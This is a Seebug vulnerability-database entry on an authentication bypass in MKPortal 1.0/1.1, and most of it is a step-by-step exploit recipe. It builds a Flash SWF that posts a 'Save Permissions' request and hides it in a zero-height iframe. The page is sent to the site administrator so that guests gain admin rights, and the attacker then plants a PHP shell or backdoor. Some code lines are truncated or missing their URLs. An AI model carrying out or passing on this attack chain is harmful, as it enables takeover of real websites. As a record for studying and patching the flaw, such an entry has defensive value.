MKPortal 1.0/1.1 Admin.PHP Authentication Bypass Vulnerability

ID SSV:83931
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


No description provided by source.


MKPortal is prone to an authentication-bypass vulnerability because it fails to restrict access to certain administrative functions.

Attackers can exploit this issue to gain unauthorized access to the application.

Versions prior to MKPortal 1.1.1 are vulnerable. 

Start Macromedia Flash and create an swf file with this code:

var idg:Number = 9;
var p13:Number = 1;
var Salva:String = "Save+Permissions";
"_self", "POST");

Translate "Save+Permissions" in MKPortal language.
Example: "Salva+questi+permessi" for italian sites.

Then upload the swf file to a webserver and create an html page like 

<title>Put a title here</title>
<p>Put some text here<p>
<iframe src="" frameborder="0" height="0" 

Now send the html page to MKPortal administrator.
When admin opens the page all guests will be able to administrate 

So you can go here:
and paste a php shell or a backdoor.
You can find your shell here:*.php
where * is the ID of the page.

Translate "page" in MKPortal language.
Example: "pagina" for italian sites.